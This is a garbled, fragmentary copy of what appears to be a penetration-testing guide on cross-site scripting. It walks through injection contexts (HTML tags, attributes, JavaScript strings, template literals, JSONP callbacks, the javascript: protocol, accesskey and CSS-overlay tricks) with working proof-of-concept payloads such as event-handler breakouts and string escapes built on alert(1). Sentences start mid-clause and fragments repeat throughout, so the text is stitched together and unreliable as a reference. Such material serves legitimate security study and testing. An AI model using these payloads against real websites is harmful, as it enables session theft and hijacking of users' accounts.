javascript:
protocol?<script>
tag??callback=alert(1)
<img , <iframe , <svg , <script
... these are just some of the many possible HTML tags you could use.
Also, keep in mind Client Side Template Injection."><img [...]
>
is encoded or deleted), depending on the tag you could create an event that executes JS code: " autofocus onfocus=alert(1) x="
"
is being encoded or deleted), then depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event like onclick=
you will be able to make it execute arbitrary code when it's clicked. Another interesting example is the attribute href
, where you can use the javascript:
protocol to execute arbitrary code: href="javascript:alert(1)"
accesskey
trick to abuse the vuln (you will need some kind of social engineer to exploit this): " accesskey="x" onclick="alert(1)" x="
<script> [...] </script>
tags of a HTML page, inside a .js
file or inside an attribute using javascript:
protocol:<script> [...] </script>
tags, even if your input if inside any kind of quotes, you can try to inject </script>
and escape from this context. This works because the browser will first parse the HTML tags and then the content, therefore, it won't notice that your injected </script>
tag is inside the HTML code.'-alert(1)-'
';-alert(1)//
\';alert(1)//
${ ... }
syntax: var greetings = `Hello, ${alert(1)}`
?callback=callbackFunc
.?callback=alert(1)
. However, it' very common that this endpoints will validate the content to only allow letters, numbers, dots and underscores ([\w\._]
).obj.sales.delOrders
.location.href
. An attacker, could abuse this to execute arbitrary JS code.<
to create new tags: Just try to reflect that char and check if it's being HTML encoded or deleted of if it is reflected without changes. Only in the last case you will be able to exploit this case.
For this cases also keep in mind Client Side Template Injection.
Note: A HTML comment can be closed using -->
or --!>
onfocus
attribute. In the XSS request, you need to end the URL with #
to make the page focus on that object and execute the code:"
is being encoded or deleted), depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event like onclick=
you will be able to make it execute arbitrary code when it's clicked.
Another interesting example is the attribute href
, where you can use the javascript:
protocol to execute arbitrary code: href="javascript:alert(1)"
<a id="author" href="http://none" onclick="var tracker='http://foo?
'-alert(1)-'
';">Go Back </a>
javascript:
or data:
in some places to execute arbitrary JS code. Some will require user interaction on some won't.javascript:
protocol can be used in any tag that accepts the attribute href
and in most of the tags that accepts the attribute src
(but not <img
)javascript:...
is being URL encoded, it will be URL decoded before it's executed.** So, if you need to escape from the string using a single quote and you see that it's being URL encoded, remember that it doesn't matter, it will be interpreted as a single quote during the execution time.URLencode + HTMLencode
in any order to encode the payload it won't work, but you can mix them inside the payload.javascript:
src
attribute of iframe
(at least) to declare HTML tags to execute JS:<a href=
tag that contains the target="_blank" and rel="opener"
attributes, check the following page to exploit this behavior:" accesskey="x" onclick="alert(1)" x="
position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5
.test {display:block; color: blue; width: 100%}
#someid {top: 0; font-family: Tahoma;}
<a href=”” id=someid class=test onclick=alert() a=””>
.js
file or between <script>...</script>
tags or between HTML events that can execute JS code or between attributes that accepts the javascript:
protocol.<script> [...] var input = 'reflected data' [...] </script>
you could easily escape closing the <script>
tag:<>
are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. It's important to fix JS syntax, because if there are any errors, the JS code won't be executed:``
. This is known as template literals as they allow to embedded JS expressions using ${ ... }
syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the syntax ${ ... }
to execute arbitrary JS code:${alert(1)}
location.href
. An attacker, could abuse this to execute arbitrary JS code.
Due to the extension of the explanation of DOM vulnerabilities it was moved to this page:mailto://
, //x:1/
, ws://
, wss://
, empty Location header, resource://
.